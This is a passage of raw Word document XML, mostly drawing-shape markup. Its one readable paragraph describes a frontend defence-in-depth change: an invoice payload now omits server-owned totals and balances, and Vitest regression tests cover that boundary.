path="m9525,l1276350,v2631,,4875,924,6735,2784c1284945,4645,1285875,6890,1285875,9525r,123825c1285875,135979,1284945,138224,1283085,140084v-1860,1861,-4104,2791,-6735,2791l9525,142875v-2630,,-4875,-930,-6735,-2791c930,138224,,135979,,133350l,9525c,6890,930,4645,2790,2784,4650,924,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1285875,142875"/>
                </v:shape>
                <v:shape id="Shape 1081" o:spid="_x0000_s1028" style="position:absolute;top:1714;width:7524;height:1429;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="7524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cTwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9La8JA&#10;EL4L/odlCr3pxgdiU1cRxdaLh0YRvA3ZyYNmZ0N2Nam/3hWE3ubje85i1ZlK3KhxpWUFo2EEgji1&#10;uuRcwem4G8xBOI+ssbJMCv7IwWrZ7y0w1rblH7olPhchhF2MCgrv61hKlxZk0A1tTRy4zDYGfYBN&#10;LnWDbQg3lRxH0UwaLDk0FFjTpqD0N7kaBfSRpfLyPTnfD8m2zZLpWfPlS6n3t279CcJT5//FL/de&#10;h/nRfATPb8IJcvkAAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAySDnE8MAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m9525,l742950,v2630,,4875,930,6735,2784c751545,4645,752475,6896,752475,9525r,123825c752475,135979,751545,138218,749685,140078v-1860,1861,-4105,2791,-6735,2797l9525,142875v-2630,-6,-4875,-936,-6735,-2797c930,138218,,135979,,133350l,9525c,6896,930,4645,2790,2784,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,752475,142875"/>
                </v:shape>
                <v:shape id="Shape 1084" o:spid="_x0000_s1029" style="position:absolute;left:8191;top:1714;width:5810;height:1429;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gAwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9LawIx&#10;EL4X+h/CCL0UzVZEdDWKFYRCD77B47gZ99HNZElS3f57UxC8zcf3nOm8NbW4kvOlZQUfvQQEcWZ1&#10;ybmCw37VHYHwAVljbZkU/JGH+ez1ZYqptjfe0nUXchFD2KeooAihSaX0WUEGfc82xJG7WGcwROhy&#10;qR3eYripZT9JhtJgybGhwIaWBWU/u1+jYL89ngeb9amqxpv3has+16tvlkq9ddrFBESgNjzFD/eX&#10;jvOT0QD+v4knyNkdAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAR+84AMMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m9525,l571500,v2630,,4875,930,6735,2784c580095,4645,581024,6896,581025,9525r,123825c581024,135979,580095,138218,578235,140078v-1860,1861,-4105,2791,-6735,2797l9525,142875v-2630,-6,-4875,-936,-6735,-2797c930,138218,,135979,,133350l,9525c,6896,930,4645,2790,2784,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,58102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3216" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="53AFEDC4" wp14:editId="1F414E39">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4533007</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>152061</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="400050" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26051" name="Group 26051"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="400050" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="400050" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1087" name="Shape 1087"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="400050" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="400050" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="390525" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="393155" y="0"/>
                                  <a:pt x="395400" y="930"/>
                                  <a:pt x="397260" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="399119" y="4645"/>
                                  <a:pt x="400050" y="6896"/>
                                  <a:pt x="400050" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="400050" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="400050" y="135979"/>
                                  <a:pt x="399119" y="138218"/>
                                  <a:pt x="397260" y="140078"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="395400" y="141939"/>
                                  <a:pt x="393155" y="142869"/>
                                  <a:pt x="390525" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142869"/>
                                  <a:pt x="4650" y="141939"/>
                                  <a:pt x="2790" y="140078"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138218"/>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783406E" id="Group 26051" o:spid="_x0000_s1026" style="position:absolute;margin-left:356.95pt;margin-top:11.95pt;width:31.5pt;height:11.25pt;z-index:-251403264" coordsize="4000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cOTwMAAKAJAAAOAAAAZHJzL2Uyb0RvYy54bWykVtuOmzAQfa/Uf0C8d7klIaBNVmr38lK1&#10;q+72A7zGBCTAyHZC0q/veMAOkNWq3c0DsT0XnzkzHvv65lhXzoEJWfJm4wZXvuuwhvKsbHYb9/fz&#10;/Ze160hFmoxUvGEb98Ske7P9/Om6a1MW8oJXGRMOOGlk2rUbt1CqTT1P0oLVRF7xljUgzLmoiYKp&#10;2HmZIB14rysv9P2V13GRtYJTJiWs3vZCd4v+85xR9TPPJVNOtXEBm8KvwO+L/nrba5LuBGmLkg4w&#10;yDtQ1KRsYFPr6pYo4uxFeeGqLqngkufqivLa43leUoYxQDSBP4vmQfB9i7Hs0m7XWpqA2hlP73ZL&#10;fxweRPvUPgpgomt3wAXOdCzHXNT6H1A6R6TsZCljR+VQWFz4vr8EYimIgkW4jpc9pbQA3i+saHH3&#10;pp1nNvUmULoWikOe45cfi/+pIC1DWmUK8T8Kp8wAvb+OXachNVQpaji4grSgniVJphL4+hhDNlKS&#10;0r1UD4wj1eTwXaq+JjMzIoUZ0WNjhgIq+82abonSdhqlHjrdOVeFTZWW1vzAnjnqKZ2wZBkuXcdk&#10;GnCeFapmrBgl/lzVKND9S0m/sj9T9ShYjjwDLtwvSpZQRLhjEg0H0kjicNVLwni90IUFcKa+pzNj&#10;lwRBgh4Xq8VQkL3IlCuEt1onq75WL0RIwWu7mfguLIIoiuAY9DZG6zVsIwBBtEziZAwhSizwIFqH&#10;wXoqtGwE4CVG4T/yYRkOFkESzfa0adHndzUT2hSfD/fFnibenhVbPxMLo/MaJ5CJvi4uASxWurlg&#10;b5kDD+PEiP6LDV1k6PGCYbM+T4tZH6V4GoYJriegVx/VkBFPjcbK81o0GOfla2P+r/NgSZydL8v7&#10;5NTZ/JlynsKmFZesr3PdV/BI2l6DpXHuZlWj2w7wQQlc7XlFFN6Rdangzq/KGvpQGMMFYs8NeNO9&#10;vm+vOFKniuneVDW/WA59Gu8hvSDF7uVbJZwD0Tc7/tA5qdqCDKuD30EVoaIfbZ+XVWVdBmg6cXl3&#10;ex/eY4OAoAZlbcfwUWEt/d6SDmj6lwXczxC0eV+AvTXCnXmjrH0DryKEOYpWD194dsI7GQmByw+p&#10;wWcAxjE8WfQ7YzxHrfPDavsXAAD//wMAUEsDBBQABgAIAAAAIQAW4pqM4AAAAAkBAAAPAAAAZHJz&#10;L2Rvd25yZXYueG1sTI/BTsMwDIbvSLxDZCRuLO02Wih1p2kCThMSGxLi5jVeW61JqiZru7cnO8HJ&#10;tvzp9+d8NelWDNy7xhqEeBaBYFNa1ZgK4Wv/9vAEwnkyilprGOHCDlbF7U1OmbKj+eRh5ysRQozL&#10;CKH2vsukdGXNmtzMdmzC7mh7TT6MfSVVT2MI162cR1EiNTUmXKip403N5Wl31gjvI43rRfw6bE/H&#10;zeVn//jxvY0Z8f5uWr+A8Dz5Pxiu+kEdiuB0sGejnGgR0njxHFCE+bUGIE2T0BwQlskSZJHL/x8U&#10;vwAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0Nv&#10;bnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAA&#10;AC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBIJ+cOTwMAAKAJAAAOAAAAAAAAAAAAAAAA&#10;AC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQAW4pqM4AAAAAkBAAAPAAAAAAAAAAAA&#10;AAAAAKkFAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAtgYAAAAA&#10;">
                <v:shape id="Shape 1087" o:spid="_x0000_s1027" style="position:absolute;width:400050;height:142875;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="400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XwvwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9NawIx&#10;EL0L/Q9hCr1pUg9VtkYRQXSPVdvzsBk3y24mSxLd9d83hYK3ebzPWW1G14k7hdh41vA+UyCIK28a&#10;rjVczvvpEkRMyAY7z6ThQRE265fJCgvjB/6i+ynVIodwLFCDTakvpIyVJYdx5nvizF19cJgyDLU0&#10;AYcc7jo5V+pDOmw4N1jsaWepak83p+EHD37rsAxl+a2UNddh17aD1m+v4/YTRKIxPcX/7qPJ89Vy&#10;AX/f5BPk+hcAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAAAAAA&#10;AAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAAAAAA&#10;AAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCVZrXwvwAAAN0AAAAPAAAAAAAA&#10;AAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA8wIAAAAA&#10;" path="m9525,l390525,v2630,,4875,930,6735,2784c399119,4645,400050,6896,400050,9525r,123825c400050,135979,399119,138218,397260,140078v-1860,1861,-4105,2791,-6735,2797l9525,142875v-2630,-6,-4875,-936,-6735,-2797c930,138218,,135979,,133350l,9525c,6896,930,4645,2790,2784,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,400050,142875"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Frontend </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>defence</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> in depth.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">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buildInvoicePayload</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now sends only the operator's choices and the expected catalogue quote. It deliberately omits </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>total_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>amount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net_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>total</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balances, credit allocation and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>inv_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>by</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those are server-derived from locked </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">records and the authenticated token. This does not replace server validation - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DevTools</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> can still add fields - but it prevents the normal UI from pretending to author values the server must own. Four </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Vitest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> regression tests assert that boundary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54696A5C"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4240" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2762A844" wp14:editId="0EDDFE17">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1856482</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-19627</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1695450" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26052" name="Group 26052"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1695450" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1695450" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1096" name="Shape 1096"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="695325" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="695325" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="685800" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="688430" y="0"/>
                                  <a:pt x="690675" y="930"/>
                                  <a:pt x="692535" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="694395" y="4645"/>
                                  <a:pt x="695325" y="6896"/>
                                  <a:pt x="695325" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="695325" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="695325" y="135979"/>
                                  <a:pt x="694395" y="138224"/>
                                  <a:pt x="692535" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="690675" y="141945"/>
                                  <a:pt x="688430" y="142875"/>
                                  <a:pt x="685800" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142875"/>
                                  <a:pt x="4650" y="141945"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138224"/>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099" name="Shape 1099"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="762000" y="0"/>
                            <a:ext cx="933450" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="933450" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="923925" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="926555" y="0"/>
                                  <a:pt x="928800" y="930"/>
                                  <a:pt x="930660" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="932520" y="4645"/>
                                  <a:pt x="933450" y="6896"/>
                                  <a:pt x="933450" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="933450" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="933450" y="135979"/>
                                  <a:pt x="932520" y="138224"/>
                                  <a:pt x="930660" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="928800" y="141945"/>
                                  <a:pt x="926555" y="142875"/>
                                  <a:pt x="923925" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142875"/>
                                  <a:pt x="4650" y="141945"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138224"/>
                                  <a:pt x="0" y="135979"/>
                                  <a:pt x="0" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6896"/>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471F37B" id="Group 26052" o:spid="_x0000_s1026" style="position:absolute;margin-left:146.2pt;margin-top:-1.55pt;width:133.5pt;height:11.25pt;z-index:-251402240" coordsize="16954,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&#10;BgAAAAAEAAQA8wAAAIAHAAAAAA==&#10;">
                <v:shape id="Shape 1096" o:spid="_x0000_s1027" style="position:absolute;width:6953;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6953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uaxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/basJA&#10;EH0v9B+WKfStbloa0egapKAoreANn4fsmIRkZ9PsatK/dwWhb3M415mmvanFlVpXWlbwPohAEGdW&#10;l5wrOB4WbyMQziNrrC2Tgj9ykM6en6aYaNvxjq57n4sQwi5BBYX3TSKlywoy6Aa2IQ7c2bYGfYBt&#10;LnWLXQg3tfyIoqE0WHJoKLChr4Kyan8xCs4/81hXn7/Zdm3lell+b07xRiv1+tLPJyA89f5f/HCv&#10;dJgfjYdw/yacIGc3AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAEqRO5rEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m9525,l685800,v2630,,4875,930,6735,2784c694395,4645,695325,6896,695325,9525r,123825c695325,135979,694395,138224,692535,140084v-1860,1861,-4105,2791,-6735,2791l9525,142875v-2630,,-4875,-930,-6735,-2791c930,138224,,135979,,133350l,9525c,6896,930,4645,2790,2784,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,695325,142875"/>
                </v:shape>
